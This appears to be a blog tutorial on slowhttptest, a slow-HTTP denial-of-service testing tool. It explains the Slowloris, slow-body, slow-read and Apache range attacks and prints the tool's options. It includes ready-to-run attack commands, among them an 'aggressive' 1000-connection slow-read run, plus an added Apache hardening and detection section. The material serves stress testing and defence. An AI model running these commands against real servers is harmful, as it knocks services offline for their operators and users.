slowhttptest

  • slowhttptest source code
  • SlowHTTPTest is a highly configurable stress-testing tool
  • In essence it crafts various special HTTP requests in an attempt to overload the server or cause a denial of service
  • It runs on the major Linux distributions as well as on Windows
  • The tool is carried by mainstream package managers and can be installed directly with apt

    apt install -y slowhttptest

0x1 Principle

slowhttptest relies on a basic property of HTTP services:

  1. The server only starts processing an HTTP request after it has received the request in full
  2. As long as an HTTP request is still being transmitted, even at a very low rate, the server keeps resources allocated for handling it
  3. When a large number of such slow, low-efficiency HTTP requests hold connections open with the server, the result is a denial of service
  4. A DoS based on this principle does not consume much server CPU; it simply ties up the server's time

Attack details:

  1. The target server's receive buffer needs to be smaller than its send buffer, and the smaller the better
  2. The resource the attacker requests should be larger than the server's send buffer (typically 64-128 KB)
  3. slowhttptest -k can be used to fill the server's buffer
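The server-side behaviour described in this section (waiting indefinitely for a request that keeps trickling in) is exactly what request-read timeouts are meant to bound. The following Apache httpd configuration is an added example, not from the original post: the weak setting is shown beside a hardened one using mod_reqtimeout. The directive names are real; the numeric values are assumptions that should be tuned against legitimate slow clients.

```apache
# Added example (not from the original post): bounding the request-read phase in Apache httpd.
# Assumes mod_reqtimeout is loaded (httpd 2.2.15+ / 2.4). Directive names are real;
# the numeric values are assumptions and should be tuned per site.

# --- Weak: only the generic socket timeout applies while a request is being read --------
# With no RequestReadTimeout, a client that delivers one header line every few seconds
# (the -H case) or trickles a large Content-Length body (the -B case) holds a worker for
# the whole Timeout window, and every new packet resets that window.
# Timeout 300
# KeepAliveTimeout 15

# --- Hardened ---------------------------------------------------------------------------
# Headers: allow 20 s, extended up to 40 s only while the client keeps delivering at least
# 500 bytes/s. A few bytes every 10 s (the default -i interval) falls below MinRate.
# Body:    allow 20 s, again extended only while >= 500 B/s arrive, so a declared
#          Content-Length of 4096 (the -s default) sent a few bytes at a time is cut off.
RequestReadTimeout header=20-40,MinRate=500 body=20,MinRate=500

# Generic I/O timeout. It also bounds how long a blocked response write waits for the client,
# which limits (but does not on its own defeat) the slow-read (-X) case, where the client
# advertises a tiny TCP window and drains the server's send buffer a few bytes per tick.
Timeout 30
KeepAliveTimeout 5

# Defaults shown; lowering LimitRequestFields ends a slow-header connection sooner, since
# each randomized "X-xx: xx" follow-up header counts toward the limit.
LimitRequestFields 100
LimitRequestFieldSize 8190
```

Check the effect with the server's own logs: connections closed by mod_reqtimeout are logged as 408 Request Timeout, so a spike of 408s from a small set of sources is the signature a monitoring rule should alert on.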

0x2 Parameters

  • First run -h to view the help text

    # slowhttptest -h
    
    slowhttptest, a tool to test for slow HTTP DoS vulnerabilities - version 1.6
    Usage: slowhttptest [options ...]
    Test modes:
      -H               slow headers a.k.a. Slowloris (default)
      -B               slow body a.k.a R-U-Dead-Yet
      -R               range attack a.k.a Apache killer
      -X               slow read a.k.a Slow Read
    
    Reporting options:
    
      -g               generate statistics with socket state changes (off)
      -o file_prefix   save statistics output in file.html and file.csv (-g required)
      -v level         verbosity level 0-4: Fatal, Info, Error, Warning, Debug
    
    General options:
    
      -c connections   target number of connections (50)
      -i seconds       interval between followup data in seconds (10)
      -l seconds       target test length in seconds (240)
      -r rate          connections per seconds (50)
      -s bytes         value of Content-Length header if needed (4096)
      -t verb          verb to use in request, default to GET for
                       slow headers and response and to POST for slow body
      -u URL           absolute URL of target (http://localhost/)
      -x bytes         max length of each randomized name/value pair of
                       followup data per tick, e.g. -x 2 generates
                       X-xx: xx for header or &xx=xx for body, where x
                       is random character (32)
      -f content-type  value of Content-type header (application/x-www-form-urlencoded)
      -m accept        value of Accept header (text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5)
    
    Probe/Proxy options:
    
      -d host:port     all traffic directed through HTTP proxy at host:port (off)
      -e host:port     probe traffic directed through HTTP proxy at host:port (off)
      -p seconds       timeout to wait for HTTP response on probe connection,
                       after which server is considered inaccessible (5)
    
    Range attack specific options:
    
      -a start        left boundary of range in range header (5)
      -b bytes        limit for range header right boundary values (2000)
    
    Slow read specific options:
    
      -k num          number of times to repeat same request in the connection. Use to
                      multiply response size if server supports persistent connections (1)
      -n seconds      interval between read operations from recv buffer in seconds (1)
      -w bytes        start of the range advertised window size would be picked from (1)
      -y bytes        end of the range advertised window size would be picked from (512)
      -z bytes        bytes to slow read from receive buffer with single read() call (5)

The key parameters are:

  1. -H: attack via the headers

    A normal, complete HTTP request ends with \r\n\r\n, but Slowloris only ever sends \r\n
  2. -B: attack via the body

    Exploits the Content-Length header: a very large Content-Length is declared, and the body is then sent very slowly
  3. -X: attack via reading (slow read)

    Sends the target server a request for a very large file but reads the response data slowly, so the file stays queued on the target server for a long time and exhausts resources; by making the TCP window size very small, the target server is forced to return data slowly
  4. -R: attack via CVE-2011-3192, mainly affecting the following Apache versions

     1. 1.3.x
     2. 2.0.x -> 2.0.64
     3. 2.2.x -> 2.2.19
  5. -u: specify the target URL
  6. -c: number of concurrent attack connections
  7. -g: generate statistics logs
  8. -o: save the statistics to a file and generate an HTML chart report; requires -g
  9. -r: how many connections to create per second
  10. -w 512 -y 1024: pick a random window size between 512 and 1024 when each connection's SYN is initialised
  11. -n 5 -z 32: read 32 bytes of data every 5 seconds
  12. -k: replay factor; how many times each attack request is automatically repeated
  13. -p: set a number of seconds; if no data is received from the server within -p seconds, the server is judged to be DoSed

0x3 Attack demo

  1. The general form of a slowhttptest attack command is as follows

    slowhttptest -H -u http://10.25.153.231/index.html
  2. A more aggressive attack can also be built as needed

    slowhttptest -c 1000 -X \
    -g -o slow_read_stats -r 200 \
    -w 512 -y 1024 \
    -n 5 -z 32 -k 3 \
    -u https://myseceureserver/resources/index.html -p 3 
    • Creates 200 attack connections per second, up to 1000 in total; each connection uses a random window size of 512->1024; 32 bytes are read from the server every 5 seconds; each attack request is sent three times; if the server gives no response for 3 consecutive seconds, the DoS is judged successful
  3. If -g -o is used to generate charts, an HTML file is produced and the result looks like this: (screenshot: Snipaste_2022-04-26_14-55-56.png)
Last modification: April 26, 2022